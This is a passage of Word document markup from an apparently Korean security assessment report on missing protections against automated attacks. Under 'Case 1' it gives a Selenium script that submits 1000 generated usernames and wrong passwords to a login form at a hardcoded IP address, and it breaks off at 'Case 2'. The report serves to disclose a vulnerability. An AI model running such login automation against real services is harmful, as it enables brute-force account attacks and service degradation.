        <w:t>로그인, 회원가입, 게시글 등록 등 주요 기능에서 자동화 공격 방어 로직이 없어 반복적인 요청이 차단되지 않는 문제가 확인되었습니다. 이로 인해 무차별 대입 공격, 가짜 계정 생성, 스팸성 게시물 등록이 가능하며 서비스 자원 고갈 및 성능 저하로 이어질 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2501617F" w14:textId="77777777" w:rsidR="00506E77" w:rsidRDefault="00506E77" w:rsidP="0096203F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71EF4070" w14:textId="36D46D29" w:rsidR="00F4259D" w:rsidRPr="00B96FB0" w:rsidRDefault="00F4259D" w:rsidP="00B96FB0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F4259D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4259D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>ase 1.</w:t>
      </w:r>
      <w:r w:rsidRPr="000D3131">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>로그인 기능 자동화 공격</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9187"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F4259D" w14:paraId="580D6A67" w14:textId="77777777" w:rsidTr="00447E2D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9187" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="42A61F7B" w14:textId="2E392324" w:rsidR="00F4259D" w:rsidRPr="00F4259D" w:rsidRDefault="00F4259D" w:rsidP="005E1156">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F4259D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>•</w:t>
            </w:r>
            <w:r w:rsidRPr="00F4259D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F4259D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">VS code </w:t>
            </w:r>
            <w:r w:rsidRPr="00F4259D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>디버그 콘솔</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0287EBAC" w14:textId="48F03821" w:rsidR="00F4259D" w:rsidRPr="00EE1712" w:rsidRDefault="00F4259D" w:rsidP="005E1156">
            <w:r w:rsidRPr="00EE1712">
              <w:t>pip install selenium</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3368D703" w14:textId="77777777" w:rsidR="00F4259D" w:rsidRDefault="00F4259D" w:rsidP="00F4259D">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r w:rsidRPr="00EE1712">
              <w:t>pip install webdriver-manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="654B5D62" w14:textId="2AFFA0DE" w:rsidR="00F4259D" w:rsidRDefault="00F4259D" w:rsidP="00F4259D">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="428" w:name="_Toc209094676"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[코드</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">]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6</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>자동화 스크립트 환경 설정 설치 코드</w:t>
      </w:r>
      <w:bookmarkEnd w:id="428"/>
    </w:p>
    <w:p w14:paraId="6FC05533" w14:textId="6E522460" w:rsidR="00522528" w:rsidRDefault="00522528" w:rsidP="00522528">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9187"/>
      </w:tblGrid>
      <w:tr w:rsidR="00522528" w14:paraId="5505AE35" w14:textId="77777777" w:rsidTr="00447E2D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9187" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6E6AE86A" w14:textId="32006963" w:rsidR="00474B90" w:rsidRPr="00474B90" w:rsidRDefault="00474B90" w:rsidP="00474B90">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00474B90">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>•</w:t>
            </w:r>
            <w:r w:rsidRPr="00474B90">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> VS code 디버그 콘솔</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75B40DF5" w14:textId="3E195F54" w:rsidR="00522528" w:rsidRPr="007A44D7" w:rsidRDefault="00522528" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>from selenium import webdriver</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1788730E"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selenium.webdriver.common.by import By</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68B2AE16"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selenium.webdriver.chrome.service import Service</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29CD5F34"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selenium.common.exceptions import UnexpectedAlertPresentException, NoAlertPresentException</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46CA263B" w14:textId="77777777" w:rsidR="00522528" w:rsidRPr="007A44D7" w:rsidRDefault="00522528" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>from webdriver_manager.chrome import ChromeDriverManager</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54298531" w14:textId="77777777" w:rsidR="00522528" w:rsidRPr="007A44D7" w:rsidRDefault="00522528" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>import time</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57E787E2" w14:textId="77777777" w:rsidR="00522528" w:rsidRPr="007A44D7" w:rsidRDefault="00522528" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6854D632" w14:textId="77777777" w:rsidR="00522528" w:rsidRPr="007A44D7" w:rsidRDefault="00522528" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t># 크롬 브라우저 실행</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19AA27FD" w14:textId="77777777" w:rsidR="00522528" w:rsidRPr="007A44D7" w:rsidRDefault="00522528" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>options = webdriver.ChromeOptions()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FCCD700" w14:textId="77777777" w:rsidR="00522528" w:rsidRPr="007A44D7" w:rsidRDefault="00522528" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>options.add_argument(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>--start-maximized</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6060D66B" w14:textId="77777777" w:rsidR="00522528" w:rsidRPr="007A44D7" w:rsidRDefault="00522528" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>driver = webdriver.Chrome(service=Service(ChromeDriverManager().install()), options=options)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E0EA248" w14:textId="77777777" w:rsidR="00522528" w:rsidRPr="007A44D7" w:rsidRDefault="00522528" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="12749514" w14:textId="77777777" w:rsidR="00522528" w:rsidRPr="007A44D7" w:rsidRDefault="00522528" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>driver.get(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00181412">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>http://43.203.87.232</w:t>
            </w:r>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>/loginForm.do</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D87C98E" w14:textId="77777777" w:rsidR="00522528" w:rsidRPr="007A44D7" w:rsidRDefault="00522528" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7D4C0348" w14:textId="77777777" w:rsidR="00522528" w:rsidRPr="007A44D7" w:rsidRDefault="00522528" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>from datetime import datetime</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6826D1EC" w14:textId="77777777" w:rsidR="00522528" w:rsidRPr="007A44D7" w:rsidRDefault="00522528" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="345032D0" w14:textId="77777777" w:rsidR="00522528" w:rsidRPr="007A44D7" w:rsidRDefault="00522528" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>for i in range(1000):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03BA1482"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try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14B16285" w14:textId="77777777" w:rsidR="00522528" w:rsidRPr="007A44D7" w:rsidRDefault="00522528" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">        # 아이디, 비밀번호 입력</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="741D50FE"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username = f</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>user{i}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23B927D2"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password = f</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>wrongpass{i}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11396D65" w14:textId="77777777" w:rsidR="00522528" w:rsidRPr="007A44D7" w:rsidRDefault="00522528" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="632687D1"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MEMBER_ID</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>).clear()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58354BBE"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MEMBER_PASSWD</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>).clear()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FA7AAAB"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MEMBER_ID</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>).send_keys(username)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E4B1227"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MEMBER_PASSWD</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>).send_keys(password)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11042635" w14:textId="77777777" w:rsidR="00522528" w:rsidRPr="007A44D7" w:rsidRDefault="00522528" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="673A7008"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 로그인 버튼 클릭</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47E8C643"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login</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>).click()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="480ACCA2" w14:textId="77777777" w:rsidR="00522528" w:rsidRPr="007A44D7" w:rsidRDefault="00522528" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="615949F4"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 alert 팝업 대기 및 처리</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3976ED15"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time.sleep(1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2272177F"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try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DFC26F3"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alert = driver.switch_to.alert</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D6EFA84"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458D634F"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ALERT: {alert.text}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C27A0DE"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alert.accept()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77535650"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except NoAlertPresentException:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="532329F5"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070D6F41"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No alert - possibly login succeeded or no popup</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2971BC86" w14:textId="77777777" w:rsidR="00522528" w:rsidRPr="007A44D7" w:rsidRDefault="00522528" w:rsidP="005E1156">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B5A2518"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except UnexpectedAlertPresentException as e:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C4DB6FA"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6C716391" w14:textId="77777777" w:rsidR="00522528" w:rsidRPr="007A44D7" w:rsidRDefault="00522528" w:rsidP="00522528">
            <w:pPr>
              <w:pStyle w:val="aa"/>
              <w:keepNext/>
              <w:ind w:leftChars="0" w:left="0"/>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Unexpected alert: {e}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="007A44D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15603E1F" w14:textId="2831814C" w:rsidR="00D221E3" w:rsidRDefault="00522528" w:rsidP="00D221E3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="429" w:name="_Toc209094677"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[코드]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7</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00474B90">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00474B90">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로그인 자동화 코드</w:t>
      </w:r>
      <w:bookmarkEnd w:id="429"/>
    </w:p>
    <w:p w14:paraId="1CB74081" w14:textId="77777777" w:rsidR="00D221E3" w:rsidRDefault="00D221E3" w:rsidP="00D221E3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CBC4347" w14:textId="283BE46F" w:rsidR="00D221E3" w:rsidRDefault="00D221E3" w:rsidP="00D221E3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C2F61CA" wp14:editId="68E515B9">
            <wp:extent cx="4572000" cy="1651959"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="24765"/>
            <wp:docPr id="1444393998" name="그림 14443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6023" b="39882"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="165195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8DA68E" w14:textId="025E91EB" w:rsidR="00D221E3" w:rsidRDefault="00D221E3" w:rsidP="00D221E3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="430" w:name="_Toc20909463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62</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>코드 실행 로그</w:t>
      </w:r>
      <w:bookmarkEnd w:id="430"/>
    </w:p>
    <w:p w14:paraId="44155BE4" w14:textId="0E6C9843" w:rsidR="00B96FB0" w:rsidRDefault="00B96FB0">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0B7C36" w14:textId="6BE143B0" w:rsidR="0005673F" w:rsidRPr="00B96FB0" w:rsidRDefault="00F4259D" w:rsidP="00B96FB0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F4259D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Case 2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4259D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
